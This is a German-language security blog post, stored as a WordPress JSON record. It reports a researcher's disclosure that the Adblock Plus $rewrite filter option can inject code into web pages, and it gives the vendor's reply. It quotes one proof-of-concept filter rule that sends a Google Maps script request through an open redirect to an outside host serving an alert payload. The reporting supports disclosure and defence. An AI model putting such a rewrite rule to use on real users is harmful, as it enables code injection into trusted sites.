{"id":217089,"date":"2019-04-16T07:15:45","date_gmt":"2019-04-16T05:15:45","guid":{"rendered":"https:\/\/www.borncity.com\/blog\/?p=217089"},"modified":"2019-04-17T11:26:19","modified_gmt":"2019-04-17T09:26:19","slug":"adblock-plus-filter-knnen-fr-malware-angriffe-genutzt-werden","status":"publish","type":"post","link":"https:\/\/borncity.com\/blog\/2019\/04\/16\/adblock-plus-filter-knnen-fr-malware-angriffe-genutzt-werden\/","title":{"rendered":"Adblock Plus Filter f&uuml;r Malware-Angriffe ausnutzbar"},"content":{"rendered":"<p><img loading=\"lazy\" decoding=\"async\" style=\"float: left; margin: 0px 10px 0px 0px; display: inline;\" src=\"https:\/\/borncity.com\/blog\/wp-content\/uploads\/2015\/01\/Schutz.jpg\" width=\"40\" height=\"47\" align=\"left\" \/>Die in Browsern verwendeten Adblock Plus Filter k\u00f6nnen ein Einfallstor f\u00fcr Schadsoftware oder Manipulationen sein, die nur schwer erkennbar sind. So die neueste Erkenntnis eines Sicherheitsforschers, der das Ganze jetzt offen gelegt hat. Nutzer sollten reagieren.<\/p>\n<p><!--more--><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/vg02.met.vgwort.de\/na\/72ef4ef84bc3492da647c3f0633beeda\" alt=\"\" width=\"1\" height=\"1\" \/>Am 17. Juli 2018 wurde eine neue Version 3.2 von des Werbeblockers Adblock Plus ver\u00f6ffentlicht. Mit der Version 3.2 wurde eine neue Filteroption zum Umschreiben (Redirect) von Anforderungen eingef\u00fchrt. Einen Tag sp\u00e4ter folgte AdBlock und gab den Support f\u00fcr die neue Filteroption frei. uBlock, das zu AdBlock geh\u00f6rt, implementierte auch das Feature. Nun bin ich bin bei <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/adblock-plus-filters-can-be-exploited-to-run-malicious-code\/\" target=\"_blank\" rel=\"noopener noreferrer\">Bleeping Computer<\/a> auf das Sicherheitsrisiko dieser Neuerung aufmerksam geworden.<\/p>\n<p><img decoding=\"async\" title=\"KRITIS-Netzwerk\" src=\"https:\/\/i.imgur.com\/yNk8TvY.jpg\" alt=\"KRITIS-Netzwerk\" \/><br \/>\n(Quelle: Pexels <a href=\"https:\/\/www.pexels.com\/de\/u\/markusspiske\/\">Markus Spiske<\/a> CC0 Lizenz)<\/p>\n<p>Sicherheitsforscher Armin Sebastian ist auf die potentielle Schwachstelle in den Adblock Plus Filtern durch das Redirect gesto\u00dfen, die er <a href=\"https:\/\/armin.dev\/blog\/2019\/04\/adblock-plus-code-injection\/\" target=\"_blank\" rel=\"noopener noreferrer\">hier detailliert beschrieben<\/a> hat. Unter bestimmten Bedingungen erm\u00f6glicht die Filteroption $rewrite den Betreuern von Filterlisten, beliebigen Code in Webseiten einzuf\u00fcgen.<\/p>\n<p>Die betroffenen Adblocker-Erweiterungen f\u00fcr Browser haben mehr als 100 Millionen aktive Benutzer. Andererseits ist die Redirect-Funktion trivial auszunutzen. Dabei kann man jeden ausreichend komplexen Webservice, einschlie\u00dflich Google-Services, angreifen. Andererseits sind Angriffe nur schwer zu erkennen und Erkennungsfunktionen lassen sich in allen g\u00e4ngigen Browsern kaum implementieren.<\/p>\n<p>Armin Sebastian schreibt, dass er die Informationen und Details der Exploit-Kette 'In Anbetracht der Art und der Auswirkungen der aufgedeckten Schwachstellen und angesichts der Tatsache, dass in der Vergangenheit Filterlisten f\u00fcr politisch motivierte Angriffe verwendet wurden' offengelegt. Er hofft, dass dies schnellstm\u00f6gliche Abhilfema\u00dfnahmen in den betroffenen Browser-Erweiterungen und Webservices gew\u00e4hrleistet.<\/p>\n<h2>Der Angriff<\/h2>\n<p>Die Filteroption $rewrite wird von einigen Werbeblockern verwendet, um Tracking-Daten zu entfernen und Anzeigen durch Umleitung von Anfragen zu blockieren. Die Option erlaubt das Rewrite nur innerhalb derselben Herkunft, und Anforderungen der Typen SCRIPT, SUBDOCUMENT, OBJECT und OBJECT_SUBREQUEST werden nicht verarbeitet.<\/p>\n<p>Armin Sebastian schreibt, dass jedoch Webservices mit Hilfe dieser Filteroption genutzt werden k\u00f6nnen, wenn sie mit XMLHttpRequest oder Fetch Codeausschnitte zur Ausf\u00fchrung herunterladen, w\u00e4hrend Anfragen beliebiger Herkunft erlaubt sind und ein serverseitiges offenes Redirect bereitgestellt wird.<\/p>\n<p>Andererseits aktualisieren die Erweiterungen die Filter regelm\u00e4\u00dfig, wobei die Intervalle von den Filterlistenbetreibern festgelegt werden. Angriffe sind schwer zu erkennen, da der Ersteller der Filterliste eine kurze Ablaufzeit f\u00fcr definieren kann. So lie\u00dfe sich die Liste der b\u00f6sartigen Filter kurz aktivieren und danach durch eine gutartige Filterliste ersetzen \u2013 die Spuren w\u00e4ren verwischt. Die erm\u00f6glicht Angriffe auf Unternehmen und Einzelpersonen auf der Grundlage von IP-Adressen, von denen die Updates der Filterlisten jeweils angefordert werden.<\/p>\n<p>Armin Sebastian formuliert folgende Bedingungen, die f\u00fcr einen erfolgreichen Manipulationsversuch erf\u00fcllt sein m\u00fcssen:<\/p>\n<ul>\n<li>Die Seite muss einen JS-String \u00fcber XMLHttpRequest oder Fetch laden und den zur\u00fcckgegebenen Code ausf\u00fchren.<\/li>\n<li>Die Seite darf die Herkunft, von der sie mit Hilfe von Anweisungen der Content Security Policy abrufen kann, nicht einschr\u00e4nken, oder sie darf die endg\u00fcltige URL der Anforderung nicht validieren, bevor sie den heruntergeladenen Code ausf\u00fchrt.<\/li>\n<li>Der Ursprung des nachgeladenen Codes muss eine serverseitige offene Umleitung haben oder beliebige Benutzerinhalte enthalten.<\/li>\n<\/ul>\n<p>Die Organisationen, die Filterlisten pflegen, k\u00f6nnen dann ein solches Regel-Update liefern, was so aussehen k\u00f6nnte:<\/p>\n<pre><code>\/^https:\/\/www.google.com\/maps\/_\/js\/k=.*\/m=pw\/.*\/rs=.*\/$rewrite=\/search?hl=en-US&amp;source=hp&amp;biw=&amp;bih=&amp;q=majestic-ramsons.herokuapp.com&amp;btnI=I%27m+Feeling+Lucky&amp;gbv=1<\/code><\/pre>\n<p>Die obige Regel leitet die Zielanfrage an den Suchdienst I'm Feeling Lucky von Google weiter, der dann zu einer Seite mit der Nutzdaten: <em>alert(document.domain) <\/em>umgeleitet wird. Armin Sebastian hat das Ganze an Google berichtet \u2013 die schreiben jedoch, dass dieses Redirect ein beabsichtigtes Verhalten sei und hat den 'Fall' geschlossen, da es kein Sicherheitsproblem darstelle. Ich bin nicht so in der Thematik drin, aber die Argumentation des Sicherheitsforschers leuchtet mir ein \u2013 und F\u00e4lle, wo Seiten von staatlichen Seiten blockiert wurden, gab es ja schon.<\/p>\n<p>Im <a href=\"https:\/\/armin.dev\/blog\/2019\/04\/adblock-plus-code-injection\/\" target=\"_blank\" rel=\"noopener noreferrer\">Blog-Beitrag<\/a> gibt Armin Sebastian noch weitere Hinweise und empfiehlt Adblock Plus, die $rewrite Filterfunktion zu entfernen. Benutzer k\u00f6nnen auch zu uBlock Origin wechseln, welches die $rewrite Filteroption nicht unterst\u00fctzt und ist nicht anf\u00e4llig f\u00fcr den beschriebenen Angriff ist. Bleeping Computer hat <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/adblock-plus-filters-can-be-exploited-to-run-malicious-code\/\" target=\"_blank\" rel=\"noopener noreferrer\">hier<\/a> noch ein paar Informationen und Beispiele ver\u00f6ffentlicht.<\/p>\n<h2>Erg\u00e4nzung: R\u00fcckmeldung von Anbieter<\/h2>\n<p>Anbieter von AdBlock Plus hat mir bereits auf Twitter folgende Antwort gegeben:<\/p>\n<blockquote class=\"twitter-tweet\" data-lang=\"de\">\n<p dir=\"ltr\" lang=\"de\">Wir arbeiten bereits daran, jegliches Risiko auszur\u00e4umen. Hier unser Statement (auf Englisch): <a href=\"https:\/\/t.co\/Kcl0sItrjE\">https:\/\/t.co\/Kcl0sItrjE<\/a><\/p>\n<p>\u2014 Adblock Plus (@AdblockPlus) <a href=\"https:\/\/twitter.com\/AdblockPlus\/status\/1118031441449955328?ref_src=twsrc%5Etfw\">16. April 2019<\/a><\/p><\/blockquote>\n<p><script async src=\"https:\/\/platform.twitter.com\/widgets.js\" charset=\"utf-8\"><\/script><\/p>\n<p>Die Kernbotschaft des Anbieters laute, dass er halten dies, vor allem aus zwei Gr\u00fcnden:<\/p>\n<ol>\n<li>Wir pr\u00fcfen alle Autoren, die an Filterlisten mitwirken, die standardm\u00e4\u00dfig in Adblock Plus aktiviert sind.<\/li>\n<li>Wir \u00fcberpr\u00fcfen diese Filterlisten regelm\u00e4\u00dfig.<\/li>\n<\/ol>\n<p>f\u00fcr ein sehr unwahrscheinliches Szenario h\u00e4lt. Zudem soll die Ausnutzung nicht trivial sein. Zudem habe man die m\u00f6glichen Risiken vor Einf\u00fchrung des Filters diskutiert und zus\u00e4tzliche Ma\u00dfnahmen <a href=\"https:\/\/github.com\/adblockplus\/adblockpluscore\/blob\/247943b2fa3464521bfee90edcbba5e64d29434e\/lib\/filterClasses.js#L1076\" target=\"_blank\" rel=\"noopener noreferrer\">auf GitHub dargelegt<\/a>. Wie jetzt gezeigt wurde, 'reichten diese Ma\u00dfnahmen f\u00fcr einige Websites nicht aus'. Zudem weist Armin Sebastian darauf hin, dass auch staatliche Institutionen da mit rein r\u00fchren k\u00f6nnten. Daher lege ich das Augenmerk auf folgende Aussage des Anbieters:<\/p>\n<blockquote><p>Es liegt in unserer Verantwortung, unsere Benutzer zu sch\u00fctzen, und obwohl das tats\u00e4chliche Risiko sehr gering ist, haben wir uns entschieden, die redirect-Option in den Filtern mit dem n\u00e4chsten Update von Adblock Plus zu entfernen.<\/p><\/blockquote>\n<p>Die Entwickler pr\u00fcfen zus\u00e4tzlich weitere Optionen, wie z.B. die Beschr\u00e4nkung aller Filterlisten auf https, was bei den standardm\u00e4\u00dfig aktivierten Listen bereits der Fall ist. Es bewegt sich also was.<\/p>\n<p><strong>Erg\u00e4nzung:<\/strong> Blog-Leser Rudi wies mich auf <a href=\"https:\/\/www.golem.de\/news\/adblock-plus-adblock-filterregeln-koennen-code-ausfuehren-1904-140701.html\" target=\"_blank\" rel=\"noopener noreferrer\">den Artikel von Hanno B\u00f6ck<\/a> auf Golem hin. Ganz lesenswert, da Hanno noch einige Erkl\u00e4rungen mitliefert.<\/p>\n<p><strong>\u00c4hnliche Artikel<\/strong><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2019\/01\/24\/google-verhindert-adblocking-in-chromium-engines\/\">Google verhindert Adblocking in Chromium-Engines<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2018\/12\/03\/botfrei-de-geht-an-adblock-plus-entwickler-eyeo\/\">Botfrei.de geht an Adblock-Plus-Entwickler Eyeo<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2018\/11\/12\/forscher-warnen-adblocker-nutzlos-aber-gefhrlich\/\">Forscher warnen: AdBlocker nutzlos, neue Angriffsvektoren<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2018\/04\/20\/das-adblocker-bgh-urteil\/\">Das Adblocker BGH-Urteil<\/a><br \/>\n<a href=\"https:\/\/borncity.com\/blog\/2017\/06\/02\/google-chrome-bekommt-2018-einen-adblocker\/\">Google Chrome bekommt 2018 einen Adblocker<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Die in Browsern verwendeten Adblock Plus Filter k\u00f6nnen ein Einfallstor f\u00fcr Schadsoftware oder Manipulationen sein, die nur schwer erkennbar sind. So die neueste Erkenntnis eines Sicherheitsforschers, der das Ganze jetzt offen gelegt hat. Nutzer sollten reagieren.<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[426],"tags":[414,4328],"class_list":["post-217089","post","type-post","status-publish","format-standard","hentry","category-sicherheit","tag-browser","tag-sicherheit"],"_links":{"self":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/217089","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/comments?post=217089"}],"version-history":[{"count":0,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/posts\/217089\/revisions"}],"wp:attachment":[{"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/media?parent=217089"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/categories?post=217089"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/borncity.com\/blog\/wp-json\/wp\/v2\/tags?post=217089"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}